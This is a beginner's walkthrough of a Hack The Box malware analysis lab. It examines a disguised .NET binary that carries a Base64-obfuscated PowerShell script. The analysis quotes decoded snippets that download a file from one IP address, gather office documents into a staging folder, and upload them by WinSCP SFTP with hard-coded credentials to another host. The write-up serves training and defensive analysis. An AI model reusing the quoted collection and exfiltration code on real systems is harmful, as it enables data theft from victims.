Heartbreaker-Continuum

Hack the Box Malware Analysis Lab

Introduction

This will be my first piece of malware I have ever analysed, I am using my VM to extract and view the malware sample.

Question 1: To accurately reference and identify the suspicious binary, please provide its SHA256 hash.

Answer: Using my terminal I used the sha256sum command to grab its hash.

└─$ sha256sum Superstar_MemberCard.tiff.exe
12daa34111bb54b3dcbad42305663e44e7e6c3842f015cccbbe6564d9dfd3ea3  Superstar_MemberCard.tiff.exe

Question 2: When was the binary file originally created, according to its metadata (UTC)?

Answer: Since its my first time looking into how to perform analysis, I looked up how to grab the most amount of information about a file. I needed to install readpe! Then to analyse the file to give me the time and date.

└─$ readpe Superstar_MemberCard.tiff.exe
DOS Header
    Magic number:                    0x5a4d (MZ)
    Bytes in last page:              144
    Pages in file:                   3
    Relocations:                     0
    Size of header in paragraphs:    4
    Minimum extra paragraphs:        0
    Maximum extra paragraphs:        65535
    Initial (relative) SS value:     0
    Initial SP value:                0xb8
    Initial IP value:                0
    Initial (relative) CS value:     0
    Address of relocation table:     0x40
    Overlay number:                  0
    OEM identifier:                  0
    OEM information:                 0
    PE header offset:                0x80
PE header
    Signature:                       0x00004550 (PE)
COFF/File header
    Machine:                         0x14c IMAGE_FILE_MACHINE_I386
    Number of sections:              3
    Date/time stamp:                 1710326286 (Wed, 13 Mar 2024 10:38:06 UTC)
    Symbol Table offset:             0
    Number of symbols:               0
    Size of optional header:         0xe0
    Characteristics:                 0x102
    Characteristics names
                                         IMAGE_FILE_EXECUTABLE_IMAGE
                                         IMAGE_FILE_32BIT_MACHINE
Optional/Image header
    Magic number:                    0x10b (PE32)
    Linker major version:            11
    Linker minor version:            0
    Size of .text section:           0x9600
    Size of .data section:           0x800
    Size of .bss section:            0
    Entrypoint:                      0xb50e
    Address of .text section:        0x2000
    Address of .data section:        0xc000
    ImageBase:                       0x400000
    Alignment of sections:           0x2000
    Alignment factor:                0x200
    Major version of required OS:    4
    Minor version of required OS:    0
    Major version of image:          0
    Minor version of image:          0
    Major version of subsystem:      4
    Minor version of subsystem:      0
    Win32 version value:             0
        Overwrite OS major version:      (default)
        Overwrite OS minor version:      (default)
        Overwrite OS build number:       (default)
        Overwrite OS platform id:        (default)
    Size of image:                   0x10000
    Size of headers:                 0x200
    Checksum:                        0
    Subsystem required:              0x2 (IMAGE_SUBSYSTEM_WINDOWS_GUI)
    DLL characteristics:             0x8540
    DLL characteristics names
                                         IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
                                         IMAGE_DLLCHARACTERISTICS_NX_COMPAT
                                         IMAGE_DLLCHARACTERISTICS_NO_SEH
                                         IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE
    Size of stack to reserve:        0x100000
    Size of stack to commit:         0x1000
    Size of heap space to reserve:   0x100000
    Size of heap space to commit:    0x1000
    Loader Flags:                    0
    Loader Flags names
Data directories
    Directory
        IMAGE_DIRECTORY_ENTRY_IMPORT:    0xb4bc (79 bytes)
    Directory
        IMAGE_DIRECTORY_ENTRY_RESOURCE:  0xc000 (1312 bytes)
    Directory
        IMAGE_DIRECTORY_ENTRY_BASERELOC: 0xe000 (12 bytes)
    Directory
        IMAGE_DIRECTORY_ENTRY_IAT:       0x2000 (8 bytes)
    Directory
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:    0x2008 (72 bytes)
Imported functions
    Library
        Name:                            mscoree.dll
        Functions
            Function
                Hint:                            0
                Name:                            _CorExeMain
Exported functions
Sections
    Section
        Name:                            .text
        Virtual Size:                    0x9514 (38164 bytes)
        Virtual Address:                 0x2000
        Size Of Raw Data:                0x9600 (38400 bytes)
        Pointer To Raw Data:             0x200
        Number Of Relocations:           0
        Characteristics:                 0x60000020
        Characteristic Names
                                             IMAGE_SCN_CNT_CODE
                                             IMAGE_SCN_MEM_EXECUTE
                                             IMAGE_SCN_MEM_READ
    Section
        Name:                            .rsrc
        Virtual Size:                    0x520 (1312 bytes)
        Virtual Address:                 0xc000
        Size Of Raw Data:                0x600 (1536 bytes)
        Pointer To Raw Data:             0x9800
        Number Of Relocations:           0
        Characteristics:                 0x40000040
        Characteristic Names
                                             IMAGE_SCN_CNT_INITIALIZED_DATA
                                             IMAGE_SCN_MEM_READ
    Section
        Name:                            .reloc
        Virtual Size:                    0xc (12 bytes)
        Virtual Address:                 0xe000
        Size Of Raw Data:                0x200 (512 bytes)
        Pointer To Raw Data:             0x9e00
        Number Of Relocations:           0
        Characteristics:                 0x42000040
        Characteristic Names
                                             IMAGE_SCN_CNT_INITIALIZED_DATA
                                             IMAGE_SCN_MEM_DISCARDABLE
                                             IMAGE_SCN_MEM_READ

Question 3: Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?

Answer: Using the same output as before, I looked for the actual text within the file. Not the headers and their sizes. Giving me an answer of 38400.

Exported functions
Sections
    Section
        Name:                            .text
        Virtual Size:                    0x9514 (38164 bytes)
        Virtual Address:                 0x2000
        Size Of Raw Data:                0x9600 (38400 bytes)
        Pointer To Raw Data:             0x200
        Number Of Relocations:           0
        Characteristics:                 0x60000020
        Characteristic Names
                                             IMAGE_SCN_CNT_CODE
                                             IMAGE_SCN_MEM_EXECUTE
                                             IMAGE_SCN_MEM_READ

Question 4: It appears that the binary may have undergone a file conversion process. Could you determine its original filename?

Answer: This is also something I had never done before, finding its original file name. After some research, using the command strings might give me the answer.

get_State
get_Reason
CompilerGeneratedAttribute
newILY.ps1
WrapNonExceptionThrows
_CorExeMain
mscoree.dll

It looks like there is a name of a .ps1 file in the strings of the file. This seems to be the original name.

Question 5: Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.

Answer: Now obfuscated code is normally done by writing code then converting it to Base64 to be used in the file. Using the hexdump command with the argument of -C, I can look for code that is obfuscated.

└─$ hexdump -C Superstar_MemberCard.tiff.exe

The output around the seemingly obfuscated code was the following:

00002c50  00 70 28 27 00 00 0a 6f  28 00 00 0a 28 a6 00 00  |.p('...o(...(...|
00002c60  0a 73 1c 01 00 0a 7a 1e  02 28 11 00 00 0a 2a 00  |.s....z..(....*.|
00002c70  36 1e 00 00 24 73 43 72  74 20 3d 20 22 3d 3d 67  |6...$sCrt = "==g|
00002c80  43 4e 55 32 59 79 39 6d  52 74 41 53 5a 7a 4a 58  |CNU2Yy9mRtASZzJX|
00002c90  64 6a 56 6d 55 74 41 69  63 70 52 45 64 6c 64 6d  |djVmUtAicpREdldm|
00002ca0  63 68 52 48 4a 67 67 47  64 68 42 56 4c 67 30 57  |chRHJggGdhBVLg0W|

The third line is where the code becomes a jumbled mess of characters. The hexadecimal offset at the start of this code would be: 2c74. The reason being the code starts at the 9 place in the hexadecimal column.

Question 6: The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?

Answer: The main body of the code seems to start after the obfuscated section that I found earlier. Since the upper half of the hex dump is the header of the file. Scrolling down a little I looked for any mention of a text file and encoding method.

000049f0  3d 20 5b 73 59 73 54 65  4d 2e 74 45 78 54 2e 65  |= [sYsTeM.tExT.e|
00004a00  4e 63 4f 64 49 6e 47 5d  3a 3a 75 54 66 38 2e 47  |NcOdInG]::uTf8.G|
00004a10  65 54 73 54 72 49 6e 47  28 5b 73 59 73 54 65 4d  |eTsTrInG([sYsTeM|
00004a20  2e 63 4f 6e 56 65 52 74  5d 3a 3a 66 52 6f 4d 62  |.cOnVeRt]::fRoMb|
00004a30  41 53 65 36 34 73 54 72  49 6e 47 28 22 24 65 6e  |ASe64sTrInG("$en|

There are a couple of interesting things here, firstly the GeTsTrInG that seems to be called to convert from Base64, giving us our answer.

Question 7: What is the specific cmdlet utilized that was used to initiate file downloads?

Answer: I had never done anything like this before, so after some research I found you can use a tool such as CyberChef to reverse engineer the code and turn the Base64 code into something more legible.

Press enter or click to view image in full size

I selected the Reverse recipe and the From Base64 to make the code readable. Now I can go hunting for my answer. At the very top of the file seems to have held the answer.

Invoke-WebRequest -Uri $url -OutFile $img

The Invoke-WebRequest command is the answer. It intakes a URL and the file. Meaning it can initiate downloads.

Question 8: Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.

Answer: This was rather simple, looking for IP address that the malware wants to connect to.

open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
$url = "http://44.206.187.144:9000/Superstar_MemberCard.tiff"

Question 9: The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?

Answer: There were a few file paths within the malware. But malware loves to invoke a variable called $targetDir that dumps the users information in the form of .txt files.

$searchDir = "C:\Users"
$targetDir = "C:\Users\Public\Public Files"

if (-not (Test-Path -Path $targetDir -PathType Container)) {
    New-Item -ItemType Directory -Path $targetDir -Force | Out-Null
}

Question 10: What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?

Answer: Looking through the code it was pretty clear that the malware wants to search for specific files with the following extensions:

$extList =  "*.doc", "*.docx", "*.xls", "*.xlsx", "*.ppt", "*.pptx", "*.pdf", "*.csv", ".*oft", "*.potx", 
            "*.xltx", "*.dotx", "*.msg", "*.eml", "*.pst",  "*.odt", "*.ods", "*.odp", "*.odg", "*.ost"

Meaning this malware would fall under the MITRE ID T1119, automated collection of data.

Question 11: What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?

Answer: There was an interesting line of code that stood out to me here. The malware attempts to open a secure FTP link with the credentials: service and password M8&C!i6KkmGL1-#, at the address 35.169.66.138. Pointing to an obvious exfiltration route for the data.

$wExePath = "$wExtractPath\WinSCP.com"
$sPath = "$wExtractPath\maintenanceScript.txt"
@"
open sftp://service:M8&C!i6KkmGL1-#@35.169.66.138/ -hostkey=*
put `"$archivePath`"
close
exit
"@ | Out-File -FilePath $sPath -Force
Start-Process -FilePath $wExePath -ArgumentList "/script=`"$sPath`"" -Wait -NoNewWindow

Conclusion

This was my first attempt at malware analysis. It took quite a bit of research and I learnt a lot along the way. I hope I can get my hands on more of theses and expand my knowledge some more, this is a major interest of mine within cybersecurity.